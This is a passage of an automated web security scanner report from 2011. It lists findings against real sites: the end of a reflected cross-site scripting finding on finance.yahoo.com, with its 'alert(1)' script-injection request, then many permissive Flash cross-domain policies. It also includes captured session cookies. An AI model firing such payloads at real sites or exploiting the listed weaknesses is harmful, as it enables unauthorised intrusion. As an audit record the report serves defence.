Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333/Retail-gasoline-prices-up-apf-2916275523.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Redirect
Date: Thu, 08 Sep 2011 19:47:06 GMT
Connection: close
Server: YTS/1.20.7
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Location: http://download.finance.yahoo.com/d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333/Retail-gasoline-prices-up-apf-2916275523.html
Content-Length: 311

<HEAD><TITLE>Redirect</TITLE></HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<FONT FACE="Helvetica,Arial"><B>
"<em>http://download.finance.yahoo.com/d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333/Retail-gasoline-prices-up-apf-2916275523.html</em>
...[SNIP]...

3. Flash cross-domain policy
There are 33 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://360.sorensonmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://360.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: 360.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=7399391306302201EC8ED885C1DF301EBE94B9D3266A90D7C75A424550F489FD629C2C3ACAAE7C766E443396D53A4DBE988DB00D0CFDBC4B96568304D3BBF7D375BA252957

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Range: bytes 0-316/317
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:24:51 GMT
ETag: "1285808463.0-317"
Last-Modified: Thu, 30 Sep 2010 01:01:03 GMT
Server: nginx/0.5.33
Content-Length: 317
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.2. http://cdn-static.viddler.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-static.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn-static.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:06 GMT
ETag: "80713937-4d-476833f70e800"
Expires: Fri, 07 Sep 2012 19:54:06 GMT
Last-Modified: Thu, 22 Oct 2009 10:06:24 GMT
Server: ECAcc (sjo/52D4)
X-Cache: HIT
Content-Length: 77

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.3. http://cdn-thumbs.viddler.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-thumbs.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn-thumbs.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:06 GMT
ETag: "780699-4d-48bbdf11afc40"
Last-Modified: Mon, 19 Jul 2010 13:56:57 GMT
Server: ECAcc (sjo/52D4)
X-Cache: HIT
Content-Length: 77

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.4. http://cdn.static.viddler.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.static.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.static.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:06 GMT
ETag: "80713937-4d-476833f70e800"
Expires: Fri, 07 Sep 2012 19:54:06 GMT
Last-Modified: Thu, 22 Oct 2009 10:06:24 GMT
Server: ECAcc (sjo/52D4)
X-Cache: HIT
Content-Length: 77

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.5. http://cdnimages.sorensonmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnimages.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdnimages.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: sDeROQsMjQ2Sd0WeMW+UC0oGczf23hsqoQVOxMS+bhFZJ5YbvB+SqQPABNsO7Z2y
x-amz-request-id: 0702A883BB175FCB
Date: Mon, 11 Oct 2010 17:53:49 GMT
x-amz-meta-s3fox-filesize: 313
x-amz-meta-s3fox-modifiedtime: 1231976316000
Last-Modified: Wed, 14 Jan 2009 23:40:33 GMT
ETag: "b39e4db0d6aa6090a0d17f1290bff7d5"
Content-Type: text/xml
Content-Length: 313
Server: AmazonS3
Age: 53872
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 3bf7fc6bfca28e69bd9ccec9701beaf2b3451b3411c94eb8ef269cd86f0393a7783dcd1f54cad24a
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 1cc1afd17178a6b946be07884b15a828.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.6. http://cdnvideos.sorensonmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnvideos.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdnvideos.sorensonmedia.com

Response

HTTP/1.0 200 OK
x-amz-id-2: 0HsrfCqJbLuvI3RCfYSZirgisWVRwczDCJmmLfnL3nSP5uN5vM7A4q5s+ZUB4osX
x-amz-request-id: 94CFB287B85B25E8
Date: Thu, 08 Sep 2011 11:40:45 GMT
x-amz-meta-s3fox-filesize: 313
x-amz-meta-s3fox-modifiedtime: 1231976316000
Last-Modified: Wed, 14 Jan 2009 23:40:15 GMT
ETag: "b39e4db0d6aa6090a0d17f1290bff7d5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 313
Server: AmazonS3
Age: 27847
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 350ac25352d701a209c003b8f2ba58964aca81ac86012a4ff7d91915f7e078061666933e03e0b14e,2703e321deb7d4cf60a40f2535426cc4fc816364da3c1a432f02fc2dfec343049b293a2cfd7e1297
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 5e67960ca17a2cc60393e082766a7dca.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://load.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315508610000"
Last-Modified: Thu, 08 Sep 2011 19:03:30 GMT
host: rcv-srv07
Content-Type: application/xml
Content-Length: 204
Date: Thu, 08 Sep 2011 19:54:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.8. http://optionsxpress.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://optionsxpress.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optionsxpress.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:24:42 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.9. http://pixel.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "1b8839-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=996383
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.10. http://rcv-srv20.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv20.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv20.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313434781000"
Last-Modified: Mon, 15 Aug 2011 18:59:41 GMT
host: rcv-srv20
Content-Type: application/xml
Content-Length: 204
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.11. http://receive.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: receive.inplay.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315510431000"
Last-Modified: Thu, 08 Sep 2011 19:33:51 GMT
host: rcv-srv38
Content-Type: application/xml
Content-Length: 204
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.12. http://static.cdn.360.sorensonmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.cdn.360.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.cdn.360.sorensonmedia.com

Response

HTTP/1.0 200 OK
x-amz-id-2: RXfGVT9cLpTqhhG/HfFmo1cNi8UJoJ7sFtzuon+SEBgIRFG9frHy42kN/hN4JrdG
x-amz-request-id: C5CD88AE7D85895F
Date: Thu, 08 Sep 2011 19:24:48 GMT
x-amz-meta-s3fox-filesize: 317
x-amz-meta-s3fox-modifiedtime: 1279214893000
Last-Modified: Mon, 18 Apr 2011 21:48:45 GMT
ETag: "e679a59ab5eb9e4ae17bb27c2114ba65"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 317
Server: AmazonS3
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: 01a2486a203ad03356e09d8c4b97ccdb149f3b0be35d0c3894750347b49b0fcfbbb1acc00214275d,69dd733dc3aa3668c51a9c23447b6fa409ab08e7f822d6824e26a1fa5d5765b3b2a7666977ff41f7
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 9f619df210e737c1479674b741ae9bf5.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://stats.optionsxpress.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.optionsxpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.optionsxpress.com

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:24:49 GMT
Server: Omniture DC/2.0.0
xserver: www380
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.14. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:54:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.15. http://www.viddler.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C107179E6A4AB982596822DF0ABF8296.viddler_a

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 08 Sep 2011 19:54:08 GMT
Content-Type: application/xml
Connection: keep-alive
X-Viddler-Node: viddler_a
Accept-Ranges: bytes
ETag: W/"80-1311663400000"
Last-Modified: Tue, 26 Jul 2011 06:56:40 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.16. http://206.106.137.34/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://206.106.137.34
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: 206.106.137.34
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/images/flash/forexTicker_splash_wide.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:37:54 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 18:07:25 GMT
ETag: "2a6ac2-503-15cc7140"
Accept-Ranges: bytes
Content-Length: 1283
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.interactivebrokers.co.uk" />
<allow-access-from domain="*.interactivebrokers.com" />
<allow-access-from domain="*.interactivebrokers.ca" />
<allow-access-from domain="*.interactivebrokers.de" />
<allow-access-from domain="*.interactivebrokers.com.hk" />
<allow-access-from domain="*.global-view.com" />
<allow-access-from domain="*.fxstreet.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.wsj.com" />
<allow-access-from domain="*.ft.com" />
<allow-access-from domain="*.e-forex.net" />
<allow-access-from domain="*.hk.quamnet.com" />
<allow-access-from domain="*.finet.hk" />
<allow-access-from domain="*.etnet.com.hk" />
<allow-access-from domain="*.discuss.com.hk" />
<allow-access-from domain="*.e-finet.com" />
<allow-access-from domain="*.actionforex.com" />
<allow-access-from domain="*.forexcenter.net" />
<allow-access-from domain="*.actionforex.net" />
<allow-access-from domain="*.profit-loss.com" />
<allow-access-from domain="*.eyereturn.com" />
<allow-access-from domain="*.atdmt.com" />
<allow-access-from domain="*.wwwibtradersu.com" />
...[SNIP]...

3.17. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

3.18. https://adwords.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 09 Sep 2011 19:08:19 GMT
Date: Thu, 08 Sep 2011 19:08:19 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 2220

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.19. http://finance.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:46:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 05 Jun 2008 01:38:47 GMT
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.20.7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="us.js2.yimg.com" />
</cross-domain-policy>

3.20. http://picasaweb.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

